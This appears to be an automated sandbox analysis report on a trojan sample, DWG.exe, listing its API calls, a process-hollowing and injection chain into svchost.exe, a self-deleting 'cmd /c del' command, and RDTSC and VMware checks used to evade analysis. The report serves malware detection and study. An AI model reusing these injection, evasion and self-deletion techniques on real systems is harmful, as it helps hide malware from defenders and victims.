Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31002
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A94120
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7F900
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B422AE
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B2FA2B
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAEBB0
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B223E3
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3DBD2
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B303DA
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAABD8
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B42B28
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9AB40
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8841F
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3D466
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2581
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8D5E0
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B425DD
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A70D20
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B42D07
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B41D55
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B42EF7
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A96E30
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3D616
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B41FF1
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B4DFCE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037CCB4F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374AB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F2B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037D23E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E03DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037EDBD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375ABD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375EBB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375138B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B236
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037DFA2B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F22AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037499BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037FE824
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E1002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F28EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F20A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0373B090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F1FF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037FDFCE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03746E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037ED616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F2EF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F1D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03720D20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F2D07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0373D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F25DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03752581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E2D82
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B477
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037ED466
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0373841F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4496
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2C9C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2C98E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F12FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2CFA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F18C80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F12D90

Source: C:\Users\user\Desktop\DWG.exe	Code function: String function: 0043691C appears 124 times
Source: C:\Users\user\Desktop\DWG.exe	Code function: String function: 00A7B150 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B150 appears 136 times

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00457368 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045B4DD NtTerminateProcess,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_004574D8 NtCreateFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045D728 NtCreateFile,NtCreateSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045D928 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_004579E8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00458A28 NtWriteFile,NtCreateSection,NtClose,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00457B08 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtGetContextThread,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00458097 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045838A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_004185E0 NtCreateFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00418690 NtReadFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00418710 NtClose,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041883A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_004185DA NtCreateFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00418632 NtCreateFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041868C NtReadFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041870B NtClose,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00ABB040 NtSuspendThread,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9A10 NtQuerySection,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00ABA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00ABAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9560 NtWriteFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB96D0 NtCreateKey,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00ABA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9760 NtOpenProcess,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00ABA770 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037699A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037696E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037696D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037695D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0376A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769A20 NtResumeThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769A10 NtQuerySection,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037699D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0376B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037698F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037698A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0376A770 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769760 NtOpenProcess,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0376A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037697A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769560 NtWriteFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0376AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03769520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037695F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F28690 NtReadFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F287C0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F28710 NtClose,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F285E0 NtCreateFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2883A NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2868C NtReadFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F28632 NtCreateFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2870B NtClose,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F285DA NtCreateFile,

Source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs DWG.exe
Source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DWG.exe

Source: DWG.exe	Virustotal: Detection: 50%
Source: DWG.exe	ReversingLabs: Detection: 37%

Source: DWG.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DWG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\DWG.exe 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Users\user\Desktop\DWG.exe	Process created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DWG.exe	Process created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Source: C:\Users\user\Desktop\DWG.exe

File created: C:\Users\user\AppData\Local\Temp\Cielert.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@10/4

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_00401593 GetDiskFreeSpaceExA,

Source: DWG.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_01

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_00448223 FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: DWG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp, svchost.exe, 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: DWG.exe, svchost.exe
Source:	Binary string: svchost.pdb source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
Source:	Binary string: svchost.pdbUGP source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_004352E0 push eax; ret
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00461801 push ecx; iretd
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0043691C push eax; ret
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041B822 push eax; ret
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041B82B push eax; ret
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041B88C push eax; ret
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_004153DF pushfd ; iretd
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_004195E8 push eax; retf
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041B7D5 push eax; ret
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00ACD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0377D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F253DF pushfd ; iretd
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2B88C push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2B822 push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2B82B push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F2B7D5 push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_02F295E8 push eax; retf

Source: DWG.exe

Static PE information: section name: .zrjfv

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_0043E8B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Process created: /c del 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Windows\SysWOW64\svchost.exe	Process created: /c del 'C:\Users\user\Desktop\DWG.exe'

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0042D406 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00441490 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00411790 IsIconic,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00440CE0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,

Source: C:\Users\user\Desktop\DWG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\DWG.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DWG.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002F18604 second address: 0000000002F1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002F1899E second address: 0000000002F189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe TID: 4740

Thread sleep time: -30000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DWG.exe

Code function: 5_2_004088D0 rdtsc

Source: C:\Users\user\Desktop\DWG.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00436310 FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00449B06 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,

Source: explorer.exe, 00000006.00000000.367292686.000000000EF3D000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.365065099.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000006.00000000.346085496.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.346085496.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000006.00000000.333633264.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}stemRoo
Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_0043E8B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\DWG.exe

Code function: 5_2_004088D0 rdtsc

Source: C:\Users\user\Desktop\DWG.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_004592D8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045DA58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045DA68 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045DA88 mov eax, dword ptr fs:[00000030h]
